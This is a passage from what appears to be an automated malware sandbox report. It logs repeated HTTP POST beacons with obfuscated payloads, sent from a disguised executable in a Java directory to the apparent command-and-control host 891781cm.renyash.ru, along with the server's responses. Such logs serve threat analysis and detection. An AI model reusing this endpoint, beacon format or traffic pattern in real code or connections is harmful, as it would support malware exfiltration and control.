                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3157&min_rtt=1561&rtt_var=3778&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=101855&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  54192.168.2.449795104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:50.515352011 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:50.868848085 CET1072OUTData Raw: 55 51 5d 50 5a 57 51 58 55 5a 54 59 51 5d 55 5d 58 58 5c 5b 59 52 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQ]PZWQXUZTYQ]U]XX\[YRRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]<6 %X1.>)>Z'>U,4/3>Q0<,-'?><T)<#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:50.959526062 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:51.126379967 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:51 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Q97p6AVnVePkeXLtrY9%2B%2BFAm2N3frfGmQrjwYESKJAvnwnzQf6HdqXmwlihj4EPaDPzhyT%2Bb78FV3jBGmBofNoNjZvaJuR2NogQvWXREwezD8u4EmCF18TvrA8%2FtjXFJ5VfwQWU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ca43b1a4321-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2194&min_rtt=2062&rtt_var=1039&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=467200&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  55192.168.2.449796104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:51.246283054 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:51.603097916 CET1072OUTData Raw: 55 5e 58 55 5a 5f 51 58 55 5a 54 59 51 5c 55 5c 58 58 5c 54 59 56 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^XUZ_QXUZTYQ\U\XX\TYVR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<<!\#]%Z&6)X0$%-$<%<)$?3^,>7<-8W)<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:51.717892885 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.449797104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:51.844161987 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1756
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:52.196845055 CET1756OUTData Raw: 55 55 5d 56 5a 57 51 5f 55 5a 54 59 51 5b 55 5d 58 5e 5c 59 59 55 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]VZWQ_UZTYQ[U]X^\YYURY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X<,=[4;-^1.)[*.[$4Q.$4_3.V'#^;?*#^!'^)
                                                                                                                  Jan 1, 2025 15:02:52.316122055 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:52.600591898 CET956INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bLkubZT1uAFj1VOVVomcLAEIHhbBpcKplHwCc7NNXzL8cEVIMC3I%2Fh4q4abnPnXoab8BSJ8xfqCBnba3N5OfPGhiPjulRQJYTNmdFXsffsey%2B%2B6DNuuXzoiw5lubmZq%2FOtjLPlrp"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cacaf26439f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8091&min_rtt=1755&rtt_var=13330&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2100&delivery_rate=27839&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 56 27 2b 05 14 3f 3e 2d 04 3b 3c 37 56 32 3f 0c 5c 24 23 24 58 26 2e 18 04 2d 38 3c 5c 3f 15 2f 10 32 04 29 59 34 32 3e 5a 31 0c 2e 5d 04 1d 25 10 3e 04 04 5f 3c 3f 31 5f 3e 1c 01 04 24 19 05 11 25 1d 30 5b 24 03 21 00 22 31 3b 54 24 23 3b 0b 28 5f 33 58 33 03 32 51 34 3a 2e 57 0d 12 22 50 32 00 36 0b 29 31 2c 56 35 2f 27 1c 24 2f 01 1e 30 3c 3c 1f 23 5e 21 0a 2a 59 2f 00 23 34 21 54 33 03 2c 03 35 00 32 00 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"V'+?>-;<7V2?\$#$X&.-8<\?/2)Y42>Z1.]%>_<?1_>$%0[$!"1;T$#;(_3X32Q4:.W"P26)1,V5/'$/0<<#^!*Y/#4!T3,526"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.449798104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:51.996642113 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:52.353030920 CET1072OUTData Raw: 50 51 58 56 5a 5a 51 5c 55 5a 54 59 51 58 55 5d 58 5f 5c 5c 59 5c 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PQXVZZQ\UZTYQXU]X_\\Y\RS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?<2#;!Y$=)]=.X&$%.B#3?)0/X/- +)#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:52.466875076 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:52.727421045 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxFd88o1c63Q%2BpibvyrUYUTwBOvXoxUEjOq0NuGjYqdDlXYsHpgG11HTNlIT39gbQCKw7XSYPp7OhjQyprRnuIxoiEQefadGFR0Zj40K6pL9hy9hg7iIy5NGXMXBKFhXSoUwk4U8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cad9fb072ad-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4883&min_rtt=1943&rtt_var=6610&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=57324&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.449799104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:52.857002974 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:02:53.212740898 CET1072OUTData Raw: 50 53 58 52 5a 5d 51 5b 55 5a 54 59 51 52 55 5c 58 5d 5c 58 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PSXRZ]Q[UZTYQRU\X]\XYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(&#+.1.=. '$-:?3&'/$/.$\?><V(,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:53.320554972 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:53.590933084 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HGwbLOoHa0w2H2HwTuSUTfoxYK91Pr64IK55QyqO30nBnbphGd4YnLiNyB3fHAlN8X5iV9ANqICj7rhLhKPCJro8x2m1FXNBhMPl7B4cbjdq%2BOCTyP8mMAuVOgpMD606g%2Fa%2BoUgH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cb2f992c34f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3373&min_rtt=1698&rtt_var=3987&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=96695&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.449801104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:53.721311092 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:54.071768999 CET1072OUTData Raw: 50 52 58 52 5f 5d 54 5e 55 5a 54 59 51 5c 55 54 58 52 5c 55 59 5c 52 5f 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PRXR_]T^UZTYQ\UTXR\UY\R_][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ^</%#]!%*>(0V980>V'+,><>$V*,#^!'^)
                                                                                                                  Jan 1, 2025 15:02:54.194719076 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:54.458345890 CET801INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pilyxe2im3KYIu32Rzf7m1wAKZvPuPNbRaTRYQrqda0omNXoqM7mPNyE1xysUZngrL0VsKGvzCcaOdfzwBL4hShkOC6who6dy1v78ZbAIs7IPrfTjuuqMDqB0M%2BieZoBdO0PhqcK"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cb86ca20f51-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2838&min_rtt=1575&rtt_var=3118&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=124946&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.449802104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:54.592762947 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:54.946846962 CET1072OUTData Raw: 55 5e 5d 53 5f 5a 54 5f 55 5a 54 59 51 5d 55 5c 58 58 5c 58 59 56 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]S_ZT_UZTYQ]U\XX\XYVRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ]?X#=Y&Z>+Y0'&W,$$!0,[<=$>#^!'^)?
                                                                                                                  Jan 1, 2025 15:02:55.052489042 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:55.313879967 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RGkQn%2FPtsWHR4a5OCZ313IDUUfWTXgxNp6rJLuJAny4rQ9MoZq%2F%2BsiWYAt8OeREvgQoyFTLlBiFvy4mGN6l%2FucTZVHnnimaY4cgA2lHdoBe7yQjNC6Yw9tDnpL2B8lguTJRy0y2%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cbdc82a8c83-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3716&min_rtt=1997&rtt_var=4188&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=92674&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.449804104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:55.450772047 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:55.806443930 CET1072OUTData Raw: 55 51 58 57 5f 5c 51 5e 55 5a 54 59 51 58 55 5c 58 5a 5c 59 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQXW_\Q^UZTYQXU\XZ\YYWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _+"4;-Y2>)Y>>$4Q,7 ^'53,;^/(^<.4=#^!'^)+
                                                                                                                  Jan 1, 2025 15:02:55.905267000 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:56.171566010 CET817INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bfsmd3WHvj%2Forc8q2Z5ft1OISeIEKifLV7srzPtgbuBzbzI6UIKwf2d8%2F78dKB%2FAHAe3vI7gZa%2FEcllTCqmDZNhhxutD9Hugx1lw%2Bi%2By%2B1zpzVGkbwcw9zWdezHuq2NEQ9%2BNsYrP"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cc3180c8c1b-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=9070&min_rtt=2738&rtt_var=13690&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=27343&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.449810104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:02:56.294423103 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:02:56.649919987 CET1072OUTData Raw: 55 57 5d 51 5a 58 51 5f 55 5a 54 59 51 5c 55 55 58 5c 5c 5f 59 53 52 58 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]QZXQ_UZTYQ\UUX\\_YSRX][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ](/%\4;%[%>+[$"W.'$^',"'#Y8_+$R(<#^!'^)
                                                                                                                  Jan 1, 2025 15:02:56.737859011 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:02:56.912230015 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:02:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OZn57GN3Bw8pxSf3AbPUZeZwdE1nWgS1WmHYWR23O7S3L%2FKiIORNBjRoP1GQKv0AoECez3gsSEde%2BZNvM1FiOPaoh0qpFiW%2BnIjZVzevRBqBinKkVcUrq3OD3TQrRZx%2FS4wrmdKt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30cc85f6a42b0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2231&min_rtt=1786&rtt_var=1561&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=272846&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
